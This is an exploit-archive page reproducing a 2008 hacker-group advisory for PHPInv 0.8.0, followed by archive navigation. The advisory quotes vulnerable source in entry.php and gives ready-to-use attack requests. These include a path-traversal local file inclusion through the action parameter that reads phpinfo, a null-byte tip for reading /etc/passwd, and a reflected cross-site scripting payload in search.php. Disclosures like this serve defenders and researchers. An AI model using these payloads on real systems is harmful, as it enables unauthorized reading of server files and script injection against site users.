phpinv-lfixss.txt

phpinv-lfixss.txt: Posted Jun 9, 2008; Authored by CWH Underground | Site citecclub.org; PHPInv version 0.8.0 suffers from local file inclusion and cross site scripting vulnerabilities.; tags | exploit, local, vulnerability, xss, file inclusion; SHA-256 | 6cbe1e2270b4e3efe4db168bc0e2119877c1d10a2c16c2f154185285f9a427c8; Download | Favorite | View

phpinv-lfixss.txt

=========================================================
 PHPInv 0.8.0 (LFI/XSS) Multiple Remote Vulnerabilities
=========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O  .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 8 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : PHPInv
 VERSION     : 0.8.0
 DOWNLOAD    : http://sourceforge.net/projects/phpinv
#####################################################

---LFI---

##############################################
Vulnerable: entry.php (?action=)

43:  if (isset($action) & !isset($noconfirm)) {
44:    include("inc/entry_$action.php");
45:  }

###############################################

---Description---

   Use Web Proxy (Web Scarab, Burb Proxy, etc...) to intercept URI -> 
http://[target]/[phpinv_path]/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=test

   Then You can change detail in GET request for this URI, Example

[-]GET http://192.168.1.103:80/phpinv/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=/../../../../../phpinfo HTTP/1.1
[-]Accept: */*
[-]User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[-]Host: 192.168.1.103
[-]Connection: Close
[-]Pragma: no-cache

   Now you can see phpinfo.php in PHPInv page...  :) 

Tip!! http://192.168.1.103:80/phpinv/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=/../../../../../etc/passwd%00 HTTP/1.1


---XSS---

[+]search.php (keyword)

GET http://192.168.1.103:80/phpinv/search.php?hash=19e9abf204087d0765f81c5bfb1a6fef&keyword=>"><script>alert(123);</script>&categoryid=1&action=Search HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 192.168.1.103
Connection: Close
Pragma: no-cache


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 56 files
Debian 19 files
LiquidWorm 18 files
Apple 9 files
Gentoo 5 files
Google Security Research 3 files
Chokri Hammedi 3 files
Alter Prime 3 files
Valentin Lobstein 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,937)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,979)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

phpinv-lfixss.txt

phpinv-lfixss.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpinv-lfixss.txt

Share This

phpinv-lfixss.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems